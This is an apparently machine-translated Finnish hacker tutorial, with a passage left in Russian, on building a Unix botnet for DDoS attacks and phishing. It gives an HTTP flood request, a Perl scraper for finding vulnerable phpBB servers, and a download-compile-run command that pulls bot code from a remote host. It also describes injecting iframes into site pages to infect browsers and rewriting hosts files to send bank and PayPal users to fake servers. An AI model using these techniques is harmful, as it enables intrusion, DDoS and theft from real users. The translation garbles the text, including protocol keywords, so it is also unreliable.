Siinä ehkä kaikki. Olen iloinen kaikista kommenteistasi. Varsinkin kritiikillä, jossa huomautetaan tekstin epätarkkuuksista/epäjohdonmukaisuuksista ja ajatuksistasi esiin nostettuun aiheeseen.

Suojausjärjestelmiä parannetaan jatkuvasti, ohjelmoijat ovat kokeneempia. Tunnettuja virheitä tehdään nyt yhä vähemmän.

[prologi]
Internet kasvaa valtavasti. Hakkerin on yhä vaikeampaa löytää haavoittuvuuksia. Järjestelmänvalvojat käyttävät hienoimpia tietoturva-asiantuntijoita suojatakseen kehitystä. Tunnistatko ajatuksesi? Itse asiassa Internet on täynnä haavoittuvuuksia, mutta niistä on vähän hyötyä. No, se on silti miltä näyttää. Kuvittele tilanne, joku verkkopaskiainen sai sinut, haluat rankaista häntä. Tänään puhumme oman taistelubotnet-verkon luomisesta.
Joten mikä on "botti"? Asiaton muistaa heti tietokonepelien tyhmät vastustajat, jotka ammutaan kahdessa minuutissa. Kyllä, tämä on osittain totta. Meidän tapauksessamme "botti" on ohjelma, joka suorittaa siihen upotetut komennot. Kuin ei mitään erikoista. Joku vastustaa: "Minä, sanotaan, kirjoitin tämän viisivuotiaana, painat nappia ja ohjelma, olya-la, sulkeutuu" Unohdetaan lapsuus. Me kaikki tiedämme, että koodauksen mahdollisuudet ovat rajattomat, ja sitä voidaan käyttää hyvään ja pahaan. Tietysti käytämme kehitystämme aina hyvässä tarkoituksessa. "Botnet" on joukko botteja, jotka on koottu yhteen keskukseen ja jotka suorittavat synkronisesti omistajan komentoja. Botit on muuten suunnattu lähinnä Windows-koneille. Täällä voit varastaa salasanoja, asentaa sukkia ja muotoilla ruuvin.Poikkean säännöistä ja kerron kuinka luodaan botnet nix-koneista. Bottimme päätehtävä on DDOS-hyökkäysten järjestäminen. Tämä on ihanteellinen tapa käyttää nix-palvelinten laajoja kanavia. Lasketaan. Palvelin, joka on "täytettävä", on 100 Mb kanavalla. Eli 10-20 samalla kanavalla seisovaa bottia kuormittaa palvelimen hetkessä. Jos pystyt piiloutumaan palomuurin taakse yhdeltä palvelimelta, ei valitettavasti ole pelastusta suuremmasta määrästä botteja

[Botin kirjoittaminen]
Löydät luettelon esimerkkibotista artikkelin lopussa olevasta linkistä. Katsotaanpa koodia. (öh, Dreamiä ohjataan taas IRC:n kautta? WEB on parempi!). Muuten, ohjaus IRC:n kautta valittiin sen interaktiivisuuden vuoksi. Oletetaan, että haluan käyttää paikallisia ydinvoiman hyväksikäyttöä parilla bottiverkon palvelimella. Suoritan yksinkertaisesti SH uname -a -komennon käyttämällä bottia ja löydän tarvitsemani tietokoneen välittömästi. Sitten, kun olen myös suorittanut komennon IRC-asiakasohjelmassa, lataan takaoven ja saan interaktiivisen kuoren jatkotoimenpiteitä varten. Mahdollisuudet ovat rajattomat. Sanotte, että tällainen valvonta voidaan toteuttaa myös WEB:n kautta, mutta miksi ladata sivu uudelleen ja hukata liikennettä? On paljon kätevämpää tarkkailla kaikkea reaaliajassa (vaikka yli 1000 botin robottiverkolla voit huolehtia käyttöliittymän mukavuudesta - terve järki). Monet ihmiset ajattelevat, että DDOS:n järjestäminen on hyvin monimutkainen asia. Tässä on esimerkkikoodi normaalille hyökkäykselle:

GET /server.org HTTP/1.0\r\nYhteys: Keep-Alive\r\nKäyttäjä-agentti: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nIsäntä: server.org:80\r\nHyväksy: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nHyväksy-koodaus: gzip\r\nAccept-Language: fi\r\nHyväksy-Charset: iso- 8859-1,*,utf-8\r\n\r\n

Eli yksinkertaisesti lähetämme pyynnön palvelimelle pakottamalla siihen vastauksen. Lisäksi lähetämme sen, kunnes palvelin kaatuu liikenteen tai prosessoriajan puutteen vuoksi. Mutta ellet ole rajoitettu yhteen nix-bottiin, sinun on luotava esimerkiksi Windows-bottiverkko, joka perustuu AgoBotiin. Voit tehdä tämän luomalla koodia botille, joka etsii lsasl/dcom-koneen haavoittuvuuksia, jotka muodostavat yhteyden palvelimeen, johon botti on asennettu.

[Luo botnet]
Itse asiassa botnetin luominen on erittäin helppoa. Tätä varten meidän on löydettävä haavoittuvuus mistä tahansa verkkoskriptistä. Löydetyn haavoittuvuuden pitäisi sallia komentotulkkikomentojen suorittaminen. Kun löydät haavoittuvuuden, kiinnitä huomiota tärkeän tiedoston nimeen, sen otsikkoon ja haavoittuvan järjestelmän nimeen. Nyt näiden tietojen avulla sinun on tehtävä hyvä hakukysely. Otetaan esimerkiksi phpBB:n tunnettu haavoittuvuus<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") tai seuraava; tulosta $sukka "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu=<$sock>; sulje($sukka);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Tässä näet kaksi ongelmaa kerralla. wget ja gcc eivät välttämättä ole läsnä tai niiden käyttö on kielletty. Täällä fech, curl ja get downloads tai lynx-konsoliselain auttaa meitä tai käytä ftp-protokollaa. Sen toteutus on monimutkaisempi, mutta etuna on, että ftp on kaikkialla. Mitä tulee kääntäjään, voit yksinkertaisesti kääntää binaarin shellissäsi ja toivoa, että kaikki on ok yhteensopivuuden kanssa, tai kirjoittaa botin uudelleen tulkituilla kielillä - Perl tai PHP. Jokaisella menetelmällä on hyvät ja huonot puolensa, kumpaa käyttää, valinta on sinun. Olen tottunut käyttämään siepattua palvelinta mahdollisimman paljon. Loppujen lopuksi nix-palvelimen botti kestää vain koneen ensimmäiseen uudelleenkäynnistykseen asti. Tästä tilanteesta on yksi mielenkiintoinen tie ulos. Botti etsii luettavia tiedostoja (.pl, .php), jotka ovat käytettävissä kirjoittamista varten, ja lisää niihin botin lataus- ja käynnistyskoodin. Tai voit luoda toisen ruuvibottiverkon. Se on myös helppo toteuttaa. Tässä tarvitsemme Internet-selaimen (Internet Explorer, Opera, Mozilla) haavoittuvuuden, joka johtaa halutun tiedoston lataamiseen ja käynnistämiseen. Seuraavaksi luodaan inframe-tietue, joka lataa haitallisen koodimme. Tämä merkintä lisätään kaikkiin hakemistotiedostoihin (tai kaikkeen, missä on html-koodia, kaikki riippuu röyhkeydestäsi). Pieni Haz-skripti, jonka löydät myös arkistaattorista, tekee erinomaista työtä tämän työn kanssa. Virhereitti on täynnä tietueita Internet Explorerin kriittisistä haavoittuvuuksista, joten meillä on myös botnet Windows-järjestelmissä hallinnassamme (mainitsin sen edut yllä). Siinä kaikki, aja hakumatomme nopealla kuorella, juo kahvia (olutta, vodkaa, tomaattimehua), mene botin ominaisuuksissa määritetylle IRC-kanavalle ja katso alaistenne lukumäärä. Lopuksi haluan sanoa terveisiä kaikille, jotka tuntevat minut ja toivottaa teille onnea. Älä jää kiinni.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

phpBB:n haavoittuvuus on merkityksellinen versioon 2.0.16 asti, vaikka kehittäjät väittävät korjanneensa sen 2.0.11:ssä

http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Tietojenkalastelu
On erittäin kätevää käyttää botteja phishing-organisaationa. Tätä varten tarvitsemme erityisiä tietojenkalastelua varten teroitettuja sivuja, jotka jäljittelevät tarvitsemaamme sivustoa ja hyvän isännöinnin, erillisen palvelimen tai VDS:n. Tällaisia ​​sivuja voi tehdä itse, ostaa, löytää verkosta. Valinta on valtava. Useimmiten tietojenkalastelua järjestetään sivustoilla: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.c om ja muilla tavalla tai toisella, jotka liittyvät verkkokauppaan. Seuraavaksi Windows-botti kirjoittaa uudelleen \system32\drivers\etc\hosts-tiedoston lisäämällä siihen palvelimesi IP-osoitteen ja määrittämällä aliaksen tarvitsemallesi sivustolle. Tiedostomuoto on:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Eli kirjoittamalla selaimeen sivustot e-gold.com ja paypal.com, käyttäjä pääsee palvelimellemme epäilemättä mitään. Vastaavia verkkotunnuksia koskevat merkinnät puolestaan ​​lisätään osoitteeseen httpd.conf.

DocumentRoot "/home/e-gold.com/www" Palvelimen nimi "www.e-gold.com" ServerAlias ​​​​"e-gold.com" "www.e-gold.com"

Tietysti selainrivillä on tuttu e-gold.com-osoite, ja edistynytkin käyttäjä kirjautuu sivustolle epäilemättä mitään. Kuvan täydentämiseksi sanon, että jos käyttäjä käyttää välityspalvelinta, tämä menetelmä ei toimi

Botit joka makuun
Agobot/Phatbot/Forbot/XtremBot
Tämä on paras robottiperhe. Kirjoitettu C++:lla. Niissä on monia havaitsemisenestoominaisuuksia ja yli 500 muutosta selkeästi määritellyn modulaarisen rakenteen ansiosta.
SDBot/RBot/UrBot/UrXBot
Tällä hetkellä erittäin suosittuja robotteja DDOS-hyökkäysten suorittamiseen. Niissä on monia lisäominaisuuksia. Kuten Sock4:n, keyloggerin, automaattisen skannerin lsass- ja dcom-haavoittuvuuksien avaaminen. Sillä on myös tehtävä uudelleenohjata pyynnöt virustorjuntayritysten sivustoille paikalliselle palvelimelle muokkaamalla tiedostoa \system32\drivers\etc\hosts ja asentamalla pieni väärennetty verkkopalvelin porttiin 80.
DSNX-botit
Tämä botti voi suorittaa DDOS-hyökkäyksiä, porttitarkistuksia ja joitain muita pieniä asioita.
Q8 Botit
Loistava botti nix-järjestelmille. Se erottuu kompaktista koodistaan ​​(27 Kb, koostuu yhdestä tiedostosta) ja hyvästä toimivuudesta. Pystyy dynaamisesti päivittämään lataamalla ja suorittamalla uuden tiedoston. Hyvin toteuttaa DDOS:n tärkeimmät toteutukset (SYN-Flood, UDP-Flood). Pystyy suorittamaan järjestelmäkomentoja. Se myös naamioi hyvin järjestelmässä.
kaiten
Hyvä botti myös Unix/Linux-järjestelmille. Pystyy avaamaan kaapatun palvelimen etäkuoren.
Perl-pohjaiset robotit
Nämä ovat hyvin pieniä botteja, jotka on kirjoitettu Perlissä. Käytetään DDOS-hyökkäyksiin Unix-pohjaisiin järjestelmiin.

---
Artikkelissa on suuri puolueellinen hakkerointi, joten se ei ole selvää - kysy.



AIHEESEEN LIITTYVÄT ARTIKKELIT